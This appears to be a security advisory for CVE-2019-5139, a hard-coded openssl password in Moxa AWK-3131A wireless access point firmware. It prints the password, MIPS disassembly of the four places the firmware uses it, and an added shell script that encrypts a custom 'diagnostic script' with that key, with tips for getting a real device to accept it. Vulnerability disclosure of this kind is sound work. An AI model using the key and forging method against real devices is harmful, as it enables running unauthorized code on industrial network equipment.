CVE-2019-5139
An exploitable use of hard-coded credentials vulnerability exists in multiple iw_* utilities of the Moxa AWK-3131A firmware version 1.13. The device operating system contains an undocumented encryption password, allowing for the creation of custom diagnostic scripts.
Moxa AWK-3131A Firmware version 1.13
http://www.moxa.com/product/AWK-3131A.htm
CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CWE-798: Use of Hard-coded Credentials
The Moxa AWK-3131A Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client is a wireless networking appliance intended for use in industrial environments. It is designed to provide wireless communication capabilities to the environments in which it is deployed. Communication with the device is possible using HTTP, Telnet, and SSH.
A hard-coded password (moxaiwroot) is passed to openssl through the -k option every time the iw_* utilities encrypt or decrypt diagnostic data: it is used to encrypt the zipped troubleshooting output the device produces (/var/ts_zip_result, /var/rdinfo.zip) and to decrypt diagnostic scripts uploaded through the device's troubleshooting portal. Because this password is the only secret in the scheme, and it is recoverable from the firmware's string tables, anyone holding it can encrypt a custom diagnostic script that the device will accept and run, and can decrypt any archive the device has exported.
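The script below is an added illustration for this advisory; it is not code from the Talos write-up or from the Moxa firmware. It reproduces the two openssl command lines visible in the recovered format strings (the encrypt form and the -d decrypt form) on an analyst's host to show what knowing the -k value buys an attacker, and includes a small check that flags any -k password found in a binary's string table. The string table, the script body and the temporary paths are constructed for the demo; the openssl CLI is assumed to be installed on the host.

```shell
#!/bin/sh
# Added example for this advisory; not code from the Talos write-up or from
# the Moxa firmware. It mirrors the openssl command lines recovered from the
# iw_* binaries to show what the hard-coded -k password buys an attacker.
# The string table, script body and temp paths below are constructed for the demo.
set -eu

HARDCODED_KEY=moxaiwroot   # the -k value embedded in the iw_* format strings

# Constructed stand-in for `strings -a <binary>` output, built from the format
# strings quoted in this advisory. Against a real image you would run the
# scanner over every extracted iw_* binary instead.
SAMPLE_STRINGS='openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %s%s
openssl aes-256-cbc -d -k moxaiwroot -salt -in "%s" -out "%s"
/var/ts_zip_result'

# Print each distinct password passed to openssl with -k, one per line.
# Any output at all means the key is baked into the binary, not derived per device.
find_hardcoded_openssl_keys() {
    printf '%s\n' "$1" | grep -o -- '-k [^ ]*' | cut -d' ' -f2 | sort -u
}

# Forge a custom "diagnostic script" the same way the device encrypts its own
# output, then run the device-side decrypt command on it and print what comes
# back. $1 is the script body. `openssl enc -aes-256-cbc` is the long form of
# the firmware's `openssl aes-256-cbc`; -k, -salt, -in and -out behave identically.
forge_and_decrypt_diag_script() {
    command -v openssl >/dev/null 2>&1 || { echo "openssl not found" >&2; return 1; }
    work=$(mktemp -d)
    printf '%s\n' "$1" > "$work/custom.sh"
    # attacker side, mirroring "openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %s"
    openssl enc -aes-256-cbc -k "$HARDCODED_KEY" -salt \
        -in "$work/custom.sh" -out "$work/custom.aes" 2>/dev/null
    # device side, mirroring "openssl aes-256-cbc -d -k moxaiwroot -salt -in \"%s\" -out \"%s\""
    openssl enc -d -aes-256-cbc -k "$HARDCODED_KEY" -salt \
        -in "$work/custom.aes" -out "$work/recovered.sh" 2>/dev/null
    cat "$work/recovered.sh"
    rm -rf "$work"
}

# Stand-alone run: list the keys found, then show the round trip.
find_hardcoded_openssl_keys "$SAMPLE_STRINGS"
forge_and_decrypt_diag_script 'echo "custom diagnostic script ran" > /tmp/proof.txt'
```

Two caveats when using this against a real device rather than a local round trip. First, `-salt` adds no secrecy here: without -pbkdf2, openssl derives both key and IV with EVP_BytesToKey from the -k password and the 8-byte salt stored in the file's "Salted__" header, so anyone with the password has everything needed. Second, the digest EVP_BytesToKey uses depends on the openssl version: releases before 1.1.0 default to MD5 and later ones to SHA-256, so a file encrypted on a modern host may need `-md md5` before an older firmware build will decrypt it.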
Disassembly for each of the four locations can be found below:
...
00402a38 8fdc0018 lw $gp, 0x18($fp) {var_c8}
00402a3c 3c020040 lui $v0, 0x40
00402a40 24444fe4 addiu $a0, $v0, 0x4fe4 {0x404fe4, "openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %s%s"}
00402a44 3c020040 lui $v0, 0x40
00402a48 24454fd0 addiu $a1, $v0, 0x4fd0 {0x404fd0, "/var/ts_zip_result"}
00402a4c 3c020040 lui $v0, 0x40
00402a50 24464f90 addiu $a2, $v0, 0x4f90 {0x404f90, "/var/"}
00402a54 8fc70100 lw $a3, 0x100($fp) {arg6}
00402a58 8f828050 lw $v0, -0x7fb0($gp) {iw_system_quiet}
00402a5c 0040c821 move $t9, $v0
00402a60 0320f809 jalr $t9
There is a second location in iw_troubleshoot where the password is used:
...
00402ee0 8fdc0020 lw $gp, 0x20($fp) {var_e48}
00402ee4 8fc20e78 lw $v0, 0xe78($fp) {arg4}
00402ee8 8c420000 lw $v0, ($v0)
00402eec 8fc30e6c lw $v1, 0xe6c($fp) {arg_4}
00402ef0 afa30010 sw $v1, 0x10($sp) {var_e58}
00402ef4 8fc30e70 lw $v1, 0xe70($fp) {arg_8}
00402ef8 afa30014 sw $v1, 0x14($sp) {var_e54}
00402efc 27c3003c addiu $v1, $fp, 0x3c {var_e2c}
00402f00 afa30018 sw $v1 {var_e2c}, 0x18($sp) {var_e50}
00402f04 3c030040 lui $v1, 0x40
00402f08 246450cc addiu $a0, $v1, 0x50cc {0x4050cc, "openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %sTS_%d_%s_%s_%s.aes"}
00402f0c 3c030040 lui $v1, 0x40
00402f10 24654fd0 addiu $a1, $v1, 0x4fd0 {0x404fd0, "/var/ts_zip_result"}
00402f14 3c030040 lui $v1, 0x40
00402f18 24664f90 addiu $a2, $v1, 0x4f90 {0x404f90, “/var/”}
00402f1c 00403821 move $a3, $v0
00402f20 8f828050 lw $v0, -0x7fb0($gp) {iw_system_quiet}
00402f24 0040c821 move $t9, $v0
00402f28 0320f809 jalr $t9
00402f2c 00000000 nop
...
...
00401aec 8fdc0010 lw $gp, 0x10($fp) {var_10}
00401af0 3c020040 lui $v0, 0x40
00401af4 24442954 addiu $a0, $v0, 0x2954 {0x402954, "openssl aes-256-cbc -k moxaiwroot -salt -in %s -out %s"}
00401af8 3c020040 lui $v0, 0x40
00401afc 24452944 addiu $a1, $v0, 0x2944 {0x402944, "/var/rdinfo.zip"}
00401b00 3c020040 lui $v0, 0x40
00401b04 2446298c addiu $a2, $v0, 0x298c {0x40298c, "/var/rdinfo.aes"}
00401b08 8f828048 lw $v0, -0x7fb8($gp) {iw_system_quiet}
00401b0c 0040c821 move $t9, $v0
00401b10 0320f809 jalr $t9
00401b14 00000000 nop
...
00457dcc 27bdfed8 addiu $sp, $sp, -0x128
00457dd0 afbf0124 sw $ra, 0x124($sp) {__saved_$ra}
00457dd4 afbe0120 sw $fp, 0x120($sp) {__saved_$fp}
00457dd8 03a0f021 move $fp, $sp {var_128}
00457ddc 3c1c004d… li $gp, 0x4cb8f0
00457de4 afbc0010 sw $gp, 0x10($sp) {var_118} {_gp}
00457de8 afc40128 sw $a0, 0x128($fp) {arg_0}
00457dec afc5012c sw $a1, 0x12c($fp) {arg_4}
00457df0 afc0001c sw $zero, 0x1c($fp) {var_10c} {0x0}
00457df4 afc00018 sw $zero, 0x18($fp) {var_110} {0x0}
00457df8 3c020047 lui $v0, 0x47
00457dfc 244416e4 addiu $a0, $v0, 0x16e4 {0x4716e4, "openssl aes-256-cbc -d -k moxaiwroot -salt -in \"%s\" -out \"%s\""}
00457e00 8fc50128 lw $a1, 0x128($fp) {arg_0}
00457e04 8fc6012c lw $a2, 0x12c($fp) {arg_4}
00457e08 8f828764 lw $v0, -0x789c($gp) {iw_system}
00457e0c 0040c821 move $t9, $v0
00457e10 0320f809 jalr $t9
00457e14 00000000 nop
...
2019-10-22 - Vendor Disclosure
2020-02-24 - Public Release
Discovered by Patrick DeSantis, Carl Hurd, and Jared Rittle of Cisco Talos.